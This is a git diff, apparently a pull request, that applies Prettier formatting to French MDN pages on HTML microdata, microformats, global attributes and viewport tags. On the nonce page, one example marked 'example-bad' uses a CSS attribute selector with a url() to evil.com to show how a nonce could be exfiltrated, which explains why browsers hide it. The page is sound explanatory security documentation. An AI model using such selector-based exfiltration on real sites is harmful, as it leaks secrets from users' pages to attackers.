 
 ```html
 <span itemscope>
-  <meta itemprop="name" content="The Castle">
+  <meta itemprop="name" content="The Castle" />
 </span>
 <figure>
- <img src="castle.jpeg">
- <figcaption>The Castle (1986)</figcaption>
+  <img src="castle.jpeg" />
+  <figcaption>The Castle (1986)</figcaption>
 </figure>
 ```
 
@@ -280,13 +271,13 @@ Une propriété est un ensemble non-ordonné de composants uniques sensibles à 
 
 1. Si un objet est un objet typé, il doit être :
 
-    1. Un nom de propriété autorisé par la spécification qui définit les types pertinents pour un objet ou
-    2. Une URL valide qui est une URL absolue qui définit un nom faisant partie de la spécification du vocabulaire ou
-    3. Une URL valide qui est une URL absolue utilisée comme un nom propriétaire ou
+   1. Un nom de propriété autorisé par la spécification qui définit les types pertinents pour un objet ou
+   2. Une URL valide qui est une URL absolue qui définit un nom faisant partie de la spécification du vocabulaire ou
+   3. Une URL valide qui est une URL absolue utilisée comme un nom propriétaire ou
 
 2. Si un objet n'est pas un objet typé, le nom doit être :
 
-    1. Une chaîne qui ne contient pas de caractères "**.**" (U+002E FULL STOP) ou "**:**" (U+003A COLON) et qui est utilisée comme un nom « propriétaire » pour la propriété (c'est-à-dire avec un nom qui n'est pas défini dans une spécification publique).
+   1. Une chaîne qui ne contient pas de caractères "**.**" (U+002E FULL STOP) ou "**:**" (U+003A COLON) et qui est utilisée comme un nom « propriétaire » pour la propriété (c'est-à-dire avec un nom qui n'est pas défini dans une spécification publique).
 
 > **Note :** Les caractères « : » sont interdits pour les valeurs qui ne sont pas des URL afin de pouvoir distinguer les URL du reste. Les valeurs avec les caractères « . » sont réservés pour de futurs ajouts et les blancs ne sont pas autorisés car les valeurs seraient analysées comme plusieurs valeurs distinctes.
 
@@ -340,35 +331,35 @@ L'ordre des noms n'a pas d'importance mais si une propriété possède plusieurs
 
 ```html
 <div itemscope>
- <p itemprop="a">1</p>
- <p itemprop="a">2</p>
- <p itemprop="b">test</p>
+  <p itemprop="a">1</p>
+  <p itemprop="a">2</p>
+  <p itemprop="b">test</p>
 </div>
 ```
 
 ```html
 <div itemscope>
- <p itemprop="b">test</p>
- <p itemprop="a">1</p>
- <p itemprop="a">2</p>
+  <p itemprop="b">test</p>
+  <p itemprop="a">1</p>
+  <p itemprop="a">2</p>
 </div>
 ```
 
 ```html
 <div itemscope>
- <p itemprop="a">1</p>
- <p itemprop="b">test</p>
- <p itemprop="a">2</p>
+  <p itemprop="a">1</p>
+  <p itemprop="b">test</p>
+  <p itemprop="a">2</p>
 </div>
 ```
 
 ```html
 <div id="x">
- <p itemprop="a">1</p>
+  <p itemprop="a">1</p>
 </div>
 <div itemscope itemref="x">
- <p itemprop="b">test</p>
- <p itemprop="a">2</p>
+  <p itemprop="b">test</p>
+  <p itemprop="a">2</p>
 </div>
 ```
 
@@ -387,16 +378,18 @@ itemprop = "name", value
 Un exemple sur un livre qu'on décrit avec les différents attributs.
 
 ```html
-<dl itemscope
-    itemtype="http://vocab.example.net/book"
-    itemid="urn:isbn:0-330-34032-8">
- <dt>Title <dd itemprop="title">The Reality Dysfunction
- <dt>Author <dd itemprop="author">Peter F. Hamilton
- <dt>Publication date
- <dd>
-  <time itemprop="pubdate" datetime="1996-01-26">
-    26 January 1996
-  </time>
+<dl
+  itemscope
+  itemtype="http://vocab.example.net/book"
+  itemid="urn:isbn:0-330-34032-8">
+  <dt>Title</dt>
+  <dd itemprop="title">The Reality Dysfunction</dd>
+  <dt>Author</dt>
+  <dd itemprop="author">Peter F. Hamilton</dd>
+  <dt>Publication date</dt>
+  <dd>
+    <time itemprop="pubdate" datetime="1996-01-26"> 26 January 1996 </time>
+  </dd>
 </dl>
 ```
 

--- a/files/fr/web/html/global_attributes/itemref/index.md
+++ b/files/fr/web/html/global_attributes/itemref/index.md
@@ -26,11 +26,11 @@ itemref
 
 ```html
 <div itemscope id="amanda" itemref="a b"></div>
-<p id="a">Name: <span itemprop="name">Amanda</span> </p>
+<p id="a">Name: <span itemprop="name">Amanda</span></p>
 <div id="b" itemprop="band" itemscope itemref="c"></div>
 <div id="c">
-    <p>Band: <span itemprop="name">Jazz Band</span> </p>
-    <p>Size: <span itemprop="size">12</span> players</p>
+  <p>Band: <span itemprop="name">Jazz Band</span></p>
+  <p>Size: <span itemprop="size">12</span> players</p>
 </div>
 ```
 

--- a/files/fr/web/html/global_attributes/nonce/index.md
+++ b/files/fr/web/html/global_attributes/nonce/index.md
@@ -25,8 +25,8 @@ Plusieurs étapes sont nécessaires afin d'utiliser un nonce pour autoriser un s
 Sur le serveur web, générez une chaîne de caractères encodées en base64 à partir de 128 bits de données générés par un générateur de nombres aléatoires cryptographique. Les nonces doivent être générés différemment à chaque chargement de la page. En Node.js par exemple, on pourra écrire&nbsp;:
 
 ```js
-const crypto = require('crypto');
-crypto.randomBytes(16).toString('base64');
+const crypto = require("crypto");
+crypto.randomBytes(16).toString("base64");
 // '8IBTHwOdqNKAWeKl7plt8g=='
 ```
 
@@ -35,7 +35,9 @@ crypto.randomBytes(16).toString('base64');
 Le nonce généré côté serveur peut ensuite être utilisé sur le script embarqué qu'on souhaite autoriser&nbsp;:
 
 ```html
-<script nonce="8IBTHwOdqNKAWeKl7plt8g==">…</script>
+<script nonce="8IBTHwOdqNKAWeKl7plt8g==">
+  …
+</script>
 ```
 
 #### Envoyer le nonce avec un en-tête CSP
@@ -51,7 +53,7 @@ Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='
 Pour des raisons de sécurité, le contenu de l'attribut `nonce` est masqué (c'est une chaîne vide qui sera renvoyé).
 
 ```js example-bad
-script.getAttribute('nonce'); // renvoie la chaîne vide
+script.getAttribute("nonce"); // renvoie la chaîne vide
 ```
 
 La propriété [`nonce`](/fr/docs/Web/API/HTMLElement/nonce) est la seule façon d'accéder aux nonces&nbsp;:
@@ -63,7 +65,7 @@ script.nonce; // renvoie la valeur du nonce
 Un tel masquage empêche des acteurs malveillants d'exfiltrer les données du nonce grâce à des mécanismes qui permettent d'accéder aux attributs comme&nbsp;:
 
 ```css example-bad
-script[nonce~=peuimporte] {
+script[nonce~="peuimporte"] {
   background: url("https://evil.com/nonce?peuimporte");
 }
 ```

--- a/files/fr/web/html/global_attributes/style/index.md
+++ b/files/fr/web/html/global_attributes/style/index.md
@@ -21,9 +21,7 @@ L'[attribut universel](/fr/docs/Web/HTML/Attributs_universels) **`style`** conti
   Cette méthode n'est pas vraiment recommandée
 </p>
 
-<p class="toto">
-  Alors que ça, c'est mieux.
-</p>
+<p class="toto">Alors que ça, c'est mieux.</p>
 ```
 
 ### CSS

--- a/files/fr/web/html/global_attributes/title/index.md
+++ b/files/fr/web/html/global_attributes/title/index.md
@@ -29,8 +29,11 @@ Un attribut `title` peut contenir plusieurs lignes. Chaque caractère `U+000A LI
 ```html
 <p>
   Les sauts de ligne au sein d'un attribut title doivent être pris en compte :
-  <abbr title="Ceci est un
-  titre sur plusieurs lignes">Exemple</abbr>.
+  <abbr
+    title="Ceci est un
+  titre sur plusieurs lignes"
+    >Exemple</abbr
+  >.
 </p>
 ```
 
@@ -48,7 +51,10 @@ Si cet attribut est défini avec la chaîne vide, cela signifie que le titre pro
 
 ```html
 <div title="Une bubulle">
-  <p>Si vous survolez cet élément, il y aura une bulle d'information "Une bubulle".</p>
+  <p>
+    Si vous survolez cet élément, il y aura une bulle d'information "Une
+    bubulle".
+  </p>
   <p title="">Et au-dessus de celui-ci, aucune info.</p>
 </div>
 ```

--- a/files/fr/web/html/global_attributes/translate/index.md
+++ b/files/fr/web/html/global_attributes/translate/index.md
@@ -19,9 +19,9 @@ L'[attribut universel](/fr/docs/Web/HTML/Attributs_universels) **`translate`** e
 
 ```html
 <label for="postcode" translate="no">
-   <span translate="yes">Enter your postcode to find the nearest store</span>
+  <span translate="yes">Enter your postcode to find the nearest store</span>
 </label>
-<input id="postcode" type="text">
+<input id="postcode" type="text" />
 ```
 
 ### Résultat

--- a/files/fr/web/html/microdata/index.md
+++ b/files/fr/web/html/microdata/index.md
@@ -59,13 +59,17 @@ Dans certains cas, les moteurs de recherche couvrent un public régional. Certai
 
 ```html
 <div itemscope itemtype="https://schema.org/SoftwareApplication">
-  <span itemprop="name">Angry Birds</span> -
+  <span itemprop="name">Angry Birds</span> - NÉCESSITE
+  <span itemprop="operatingSystem">ANDROID</span><br />
+  <link
+    itemprop="applicationCategory"
+    href="https://schema.org/GameApplication" />
 
-  NÉCESSITE <span itemprop="operatingSystem">ANDROID</span><br>
-  <link itemprop="applicationCategory" href="https://schema.org/GameApplication"/>
-
-  <div itemprop="aggregateRating" itemscope itemtype="https://schema.org/AggregateRating">
-  ÉVALUATION :
+  <div
+    itemprop="aggregateRating"
+    itemscope
+    itemtype="https://schema.org/AggregateRating">
+    ÉVALUATION :
     <span itemprop="ratingValue">4.6</span> (
     <span itemprop="ratingCount">8864</span> notes )
   </div>

--- a/files/fr/web/html/microformats/index.md
+++ b/files/fr/web/html/microformats/index.md
@@ -68,7 +68,9 @@ La valeur de chaque propriété est définie en HTML via l'attribut `class`.
 <p class="h-card">
   <img class="u-photo" src="http://example.org/photo.png" alt="" />
   <a class="p-name u-url" href="http://example.org">Joe Bloggs</a>
-  <a class="u-email" href="mailto:joebloggs@example.com">joebloggs@example.com</a>,
+  <a class="u-email" href="mailto:joebloggs@example.com"
+    >joebloggs@example.com</a
+  >,
   <span class="p-street-address">17 Austerstræti</span>
   <span class="p-locality">Reykjavík</span>
   <span class="p-country-name">Iceland</span>
@@ -90,12 +92,10 @@ La valeur de chaque propriété est définie en HTML via l'attribut `class`.
 
 ```html
 <div class="h-card">
-  <a class="p-name u-url"
-   href="http://blog.lizardwrangler.com/"
-  >Mitchell Baker</a>
-  (<a class="p-org h-card"
-    href="http://mozilla.org/"
-   >Mozilla Foundation</a>)
+  <a class="p-name u-url" href="http://blog.lizardwrangler.com/"
+    >Mitchell Baker</a
+  >
+  (<a class="p-org h-card" href="http://mozilla.org/">Mozilla Foundation</a>)
 </div>
 ```
 
@@ -103,21 +103,25 @@ Cela fournira le JSON suivant :
 
 ```json
 {
-  "items": [{
-  "type": ["h-card"],
-  "properties": {
-    "name": ["Mitchell Baker"],
-    "url": ["http://blog.lizardwrangler.com/"],
-    "org": [{
-    "value": "Mozilla Foundation",
-    "type": ["h-card"],
-    "properties": {
-      "name": ["Mozilla Foundation"],
-      "url": ["http://mozilla.org/"]
+  "items": [
+    {
+      "type": ["h-card"],
+      "properties": {
+        "name": ["Mitchell Baker"],
+        "url": ["http://blog.lizardwrangler.com/"],
+        "org": [
+          {
+            "value": "Mozilla Foundation",
+            "type": ["h-card"],
+            "properties": {
+              "name": ["Mozilla Foundation"],
+              "url": ["http://mozilla.org/"]
+            }
+          }
+        ]
+      }
     }
-    }]
-  }
-  }]
+  ]
 }
 ```
 
@@ -130,13 +134,18 @@ Le microformat [h-entry](http://microformats.org/wiki/h-entry) représente un co
 ```html
 <article class="h-entry">
   <h1 class="p-name">Microformats are amazing</h1>
-  <p>Published by <a class="p-author h-card" href="http://example.com">W. Developer</a>
-   on <time class="dt-published" datetime="2013-06-13 12:00:00">13<sup>th</sup> June 2013</time></p>
+  <p>
+    Published by
+    <a class="p-author h-card" href="http://example.com">W. Developer</a> on
+    <time class="dt-published" datetime="2013-06-13 12:00:00"
+      >13<sup>th</sup> June 2013</time
+    >
+  </p>
 
   <p class="p-summary">In which I extoll the virtues of using microformats.</p>
 
   <div class="e-content">
-  <p>Blah blah blah</p>
+    <p>Blah blah blah</p>
   </div>
 </article>
 ```
@@ -155,16 +164,42 @@ Le microformat [h-entry](http://microformats.org/wiki/h-entry) représente un co
 
 ```html
 <div class="h-entry">
-  <p><span class="p-author h-card">
-    <a href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106" ><img class="u-photo" src="https://quickthoughts.jgregorymcverry.com/file/2d6c9cfed7ac8e849f492b5bc7e6a630/thumb.jpg"/></a>
-    <a class="p-name u-url" href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106">Greg McVerry</a></span>
-     Replied to <a class="u-in-reply-to" href="https://developer.mozilla.org/fr/docs/Web/HTML/microformats">a post on
-   <strong>developer.mozilla.org</strong> </a>:
+  <p>
+    <span class="p-author h-card">
+      <a href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106"
+        ><img
+          class="u-photo"
+          src="https://quickthoughts.jgregorymcverry.com/file/2d6c9cfed7ac8e849f492b5bc7e6a630/thumb.jpg"
+      /></a>
+      <a
+        class="p-name u-url"
+        href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106"
+        >Greg McVerry</a
+      ></span
+    >
+    Replied to
+    <a
+      class="u-in-reply-to"
+      href="https://developer.mozilla.org/fr/docs/Web/HTML/microformats"
+      >a post on <strong>developer.mozilla.org</strong> </a
+    >:
   </p>
-   <p class="p-name e-content">Hey thanks for making this microformats resource</p>
-   <p> <a href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106">Greg McVerry</a>
-  published this <a class="u-url url" href="https://quickthoughts.jgregorymcverry.com/2019/05/31/hey-thanks-for-making-this-microformats-resource"><time class="dt-published"
-   datetime="2019-05-31T14:19:09+0000">31 May 2019</time></a></p>
+  <p class="p-name e-content">
+    Hey thanks for making this microformats resource
+  </p>
+  <p>
+    <a href="https://quickthoughts.jgregorymcverry.com/profile/jgmac1106"
+      >Greg McVerry</a
+    >
+    published this
+    <a
+      class="u-url url"
+      href="https://quickthoughts.jgregorymcverry.com/2019/05/31/hey-thanks-for-making-this-microformats-resource"
+      ><time class="dt-published" datetime="2019-05-31T14:19:09+0000"
+        >31 May 2019</time
+      ></a
+    >
+  </p>
 </div>
 ```
 
@@ -172,12 +207,16 @@ Le microformat [h-entry](http://microformats.org/wiki/h-entry) représente un co
 {
   "items": [
     {
-      "type": [ "h-entry" ],
+      "type": ["h-entry"],
       "properties": {
-        "in-reply-to": [ "https://developer.mozilla.org/fr/docs/Web/HTML/microformats" ],
-        "name": [ "Hey thanks for making this microformats resource" ],
-        "url": [ "https://quickthoughts.jgregorymcverry.com/2019/05/31/hey-thanks-for-making-this-microformats-resource" ],
-        "published": [ "2019-05-31T14:19:09+0000" ],
+        "in-reply-to": [
+          "https://developer.mozilla.org/fr/docs/Web/HTML/microformats"
+        ],
+        "name": ["Hey thanks for making this microformats resource"],
+        "url": [
+          "https://quickthoughts.jgregorymcverry.com/2019/05/31/hey-thanks-for-making-this-microformats-resource"
+        ],
+        "published": ["2019-05-31T14:19:09+0000"],
         "content": [
           {
             "html": "Hey thanks for making this microformats resource",
@@ -187,11 +226,15 @@ Le microformat [h-entry](http://microformats.org/wiki/h-entry) représente un co
         ],
         "author": [
           {
-            "type": [ "h-card" ],
+            "type": ["h-card"],
             "properties": {
-              "name": [ "Greg McVerry" ],
-              "photo": [ "https://quickthoughts.jgregorymcverry.com/file/2d6c9cfed7ac8e849f492b5bc7e6a630/thumb.jpg" ],
-              "url": [ "https://quickthoughts.jgregorymcverry.com/profile/jgmac1106" ]
+              "name": ["Greg McVerry"],
+              "photo": [
+                "https://quickthoughts.jgregorymcverry.com/file/2d6c9cfed7ac8e849f492b5bc7e6a630/thumb.jpg"
+              ],
+              "url": [
+                "https://quickthoughts.jgregorymcverry.com/profile/jgmac1106"
+              ]
             },
             "lang": "en",
             "value": "Greg McVerry"
@@ -214,12 +257,18 @@ Le microformat [h-feed](http://microformats.org/wiki/h-feed) est un flux de bill
 <div class="h-feed">
   <h1 class="p-name">Microformats Blogs</h1>
   <article class="h-entry">
-  <h2 class="p-name">Microformats are amazing</h2>
-  <p>Published by <a class="p-author h-card" href="http://example.com">W. Developer</a>
-     on <time class="dt-published" datetime="2013-06-13 12:00:00">13<sup>th</sup> June 2013</time>
-  </p>
-  <p class="p-summary">In which I extoll the virtues of using microformats.</p>
-  <div class="e-content"> <p>Blah blah blah</p> </div>
+    <h2 class="p-name">Microformats are amazing</h2>
+    <p>
+      Published by
+      <a class="p-author h-card" href="http://example.com">W. Developer</a> on
+      <time class="dt-published" datetime="2013-06-13 12:00:00"
+        >13<sup>th</sup> June 2013</time
+      >
+    </p>
+    <p class="p-summary">
+      In which I extoll the virtues of using microformats.
+    </p>
+    <div class="e-content"><p>Blah blah blah</p></div>
   </article>
 </div>
 ```
@@ -251,11 +300,17 @@ Le microformat `h-event` permet de représenter des évènements.
 ```html
 <div class="h-event">
   <h1 class="p-name">Microformats Meetup</h1>
-  <p>From
-  <time class="dt-start" datetime="2013-06-30 12:00">30<sup>th</sup> June 2013, 12:00</time>
-  to <time class="dt-end" datetime="2013-06-30 18:00">18:00</time>
-  at <span class="p-location">Some bar in SF</span></p>
-  <p class="p-summary">Get together and discuss all things microformats-related.</p>
+  <p>
+    From
+    <time class="dt-start" datetime="2013-06-30 12:00"
+      >30<sup>th</sup> June 2013, 12:00</time
+    >
+    to <time class="dt-end" datetime="2013-06-30 18:00">18:00</time> at
+    <span class="p-location">Some bar in SF</span>
+  </p>
+  <p class="p-summary">
+    Get together and discuss all things microformats-related.
+  </p>
 </div>
 ```
 
@@ -274,25 +329,38 @@ Le microformat `h-event` permet de représenter des évènements.
 ```html
 <div class="h-event">
   <h2 class="p-name">IndieWeb Summit</h2>
-  <time class="dt-start" datetime="2019-06-29T09:00:00-07:00">June 29, 2019 at 9:00am  (-0700)</time><br>through <time class="dt-end" datetime="2019-06-30T18:00:00-07:00">June 30, 2019 at 6:00pm (-0700)</time><br>
+  <time class="dt-start" datetime="2019-06-29T09:00:00-07:00"
+    >June 29, 2019 at 9:00am (-0700)</time
+  ><br />through
+  <time class="dt-end" datetime="2019-06-30T18:00:00-07:00"
+    >June 30, 2019 at 6:00pm (-0700)</time
+  ><br />
   <div class="p-location h-card">
     <div>
-    <span class="p-name">Mozilla</span>
-     </div>
-     <div>
+      <span class="p-name">Mozilla</span>
+    </div>
+    <div>
       <span class="p-street-address">1120 NW Couch St</span>,
       <span class="p-locality">Portland</span>,
       <span class="p-region">Oregon</span>,
       <span class="p-country">US</span>
-     </div>
-       <data class="p-latitude" value="45.52345"></data>
-      <data class="p-longitude" value="-122.682677"></data>
-  </div>
-    <div class="e-content">Come join us
-     </div>
-    <div>
-     <span class="p-author h-card"><a class="u-url p-name" href="https://aaronparecki.com">Aaron Parecki</a></span> Published this <a href="https://aaronparecki.com/2019/06/29/1/" class="u-url">event </a>on <time class="dt published" datetime="2019-05-25T18:00:00-07:00">May 5th, 2019</time>
     </div>
+    <data class="p-latitude" value="45.52345"></data>
+    <data class="p-longitude" value="-122.682677"></data>
+  </div>
+  <div class="e-content">Come join us</div>
+  <div>
+    <span class="p-author h-card"
+      ><a class="u-url p-name" href="https://aaronparecki.com"
+        >Aaron Parecki</a
+      ></span
+    >
+    Published this
+    <a href="https://aaronparecki.com/2019/06/29/1/" class="u-url">event </a>on
+    <time class="dt published" datetime="2019-05-25T18:00:00-07:00"
+      >May 5th, 2019</time
+    >
+  </div>
 </div>
 ```
 

--- a/files/fr/web/html/quirks_mode_and_standards_mode/index.md
+++ b/files/fr/web/html/quirks_mode_and_standards_mode/index.md
@@ -15,14 +15,13 @@ Il existe aujourd'hui trois modes utilisés par les moteurs de rendu des navigat
 Pour les documents [HTML](/fr/docs/Web/HTML), les navigateurs utilisent le `DOCTYPE` présent au début du document afin de déterminer si celui-ci doit être géré avec le mode _quirks_ ou avec l'un des modes standards. Si vous souhaitez qu'une page utilise le mode standard total, son DOCTYPE devra correspondre à celui utilisé dans cet exemple :
 
 ```html
-<!DOCTYPE html>
+<!doctype html>
 <html lang="fr">
   <head>
-    <meta charset=UTF-8>
+    <meta charset="UTF-8" />
     <title>Bonjour tout le monde !</title>
   </head>
-  <body>
-  </body>
+  <body></body>
 </html>
 ```
 

--- a/files/fr/web/html/viewport_meta_tag/index.md
+++ b/files/fr/web/html/viewport_meta_tag/index.md
@@ -27,7 +27,7 @@ Pour en savoir plus sur les fenêtres d'affichage dans les différents navigateu
 Un site type, optimisé pour les mobiles, contient quelque chose comme ce qui suit :
 
 ```html
-<meta name="viewport" content="width=device-width, initial-scale=1">
+<meta name="viewport" content="width=device-width, initial-scale=1" />
 ```
 
 La propriété `width` contrôle la taille de la zone d'affichage. Elle peut être définie sur un nombre spécifique de pixels comme `width=600` ou sur la valeur spéciale `device-width`, qui est la largeur de l'écran en pixels CSS à une échelle de 100%. (Il existe des valeurs `height` et `device-height` correspondantes, qui peuvent être utiles pour les pages comportant des éléments qui changent de taille ou de position en fonction de la hauteur du viewport).
@@ -55,7 +55,7 @@ Les sites peuvent définir leur viewport à une taille spécifique. Par exemple,
 Pour les pages qui définissent une échelle initiale ou maximale, cela signifie que la propriété `width` se traduit en fait par une largeur _minimum_ de viewport. Par exemple, si votre mise en page nécessite une largeur d'au moins 500 pixels, vous pouvez utiliser le balisage suivant. Lorsque la largeur de l'écran est supérieure à 500 pixels, le navigateur élargira la fenêtre d'affichage (plutôt que de zoomer) pour s'adapter à l'écran :
 
 ```html
-<meta name="viewport" content="width=500, initial-scale=1">
+<meta name="viewport" content="width=500, initial-scale=1" />
 ```
 
 Les autres [attributs](/fr/docs/Web/HTML/Element/meta#attributes) disponibles sont `minimum-scale`, `maximum-scale` et `user-scalable`. Ces propriétés affectent l'échelle et la largeur initiales, ainsi que la limitation des changements de niveau de zoom.
@@ -63,13 +63,15 @@ Les autres [attributs](/fr/docs/Web/HTML/Element/meta#attributes) disponibles so
 Tous les navigateurs mobiles ne gèrent pas les changements d'orientation de la même manière. Par exemple, Mobile Safari se contente souvent de zoomer la page lors du passage du portrait au paysage, au lieu de la disposer comme elle le ferait si elle était initialement chargée en paysage. Si les développeurs et développeuses Web veulent que leurs paramètres d'échelle restent cohérents lors du changement d'orientation sur l'iPhone, ils/elles doivent ajouter une valeur `maximum-scale` pour empêcher ce zoom, ce qui a l'effet secondaire parfois indésirable d'empêcher les utilisateurs/utilisatrices de faire un zoom avant&nbsp;:
 
 ```html
-<meta name="viewport" content="initial-scale=1, maximum-scale=1">
+<meta name="viewport" content="initial-scale=1, maximum-scale=1" />
 ```
 
 Supprimer le petit zoom appliqué par de nombreux smartphones en définissant les valeurs d'échelle initiale et d'échelle minimale à 0,86. Le résultat est que le défilement horizontal est supprimé dans n'importe quelle orientation et que l'utilisateur peut zoomer s'il le souhaite.
 
 ```html
-<meta name="viewport" content="width=device-width, initial-scale=0.86, maximum-scale=5.0, minimum-scale=0.86">
+<meta
+  name="viewport"
+  content="width=device-width, initial-scale=0.86, maximum-scale=5.0, minimum-scale=0.86" />
 ```
 
 ## Tailles communes des fenêtres d'affichage pour les appareils mobiles et les tablettes


### PR DESCRIPTION
This PR formats the `/web/html` folder of the French locale using Prettier.  This is the third part.
